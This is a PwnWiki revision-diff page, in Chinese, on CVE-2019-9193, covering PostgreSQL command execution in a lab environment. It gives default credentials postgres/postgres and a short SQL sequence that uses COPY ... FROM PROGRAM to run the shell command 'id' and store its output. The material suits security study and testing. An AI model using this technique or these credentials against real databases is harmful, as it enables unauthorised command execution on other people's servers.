Difference between revisions of "CVE-2019-9193 PostgreSQL 高權限命令執行漏洞"
From PwnWiki
(Created page with "<languages /> <translate> ==漏洞利用== </translate> <translate> 啟動漏洞環境後, 將開啟Postgres默認的5432端口,默認賬號密碼為postgres/postgres...") |
(Marked this version for translation) |
||
| Line 2: | Line 2: | ||
<translate> | <translate> | ||
| − | ==漏洞利用== | + | ==漏洞利用== <!--T:1--> |
</translate> | </translate> | ||
<translate> | <translate> | ||
| + | <!--T:2--> | ||
啟動漏洞環境後, 將開啟Postgres默認的5432端口,默認賬號密碼為postgres/postgres, 連接到數據庫。 | 啟動漏洞環境後, 將開啟Postgres默認的5432端口,默認賬號密碼為postgres/postgres, 連接到數據庫。 | ||
</translate> | </translate> | ||
| Line 16: | Line 17: | ||
<translate> | <translate> | ||
| + | <!--T:3--> | ||
FROM PROGRAM語句將執行命令id並將結果保存在cmd_exec表中。 | FROM PROGRAM語句將執行命令id並將結果保存在cmd_exec表中。 | ||
</translate> | </translate> | ||
Latest revision as of 19:43, 7 April 2021
漏洞利用
啟動漏洞環境後, 將開啟Postgres默認的5432端口,默認賬號密碼為postgres/postgres, 連接到數據庫。
DROP TABLE IF EXISTS cmd_exec; CREATE TABLE cmd_exec(cmd_output text); COPY cmd_exec FROM PROGRAM 'id'; SELECT * FROM cmd_exec;
FROM PROGRAM語句將執行命令id並將結果保存在cmd_exec表中。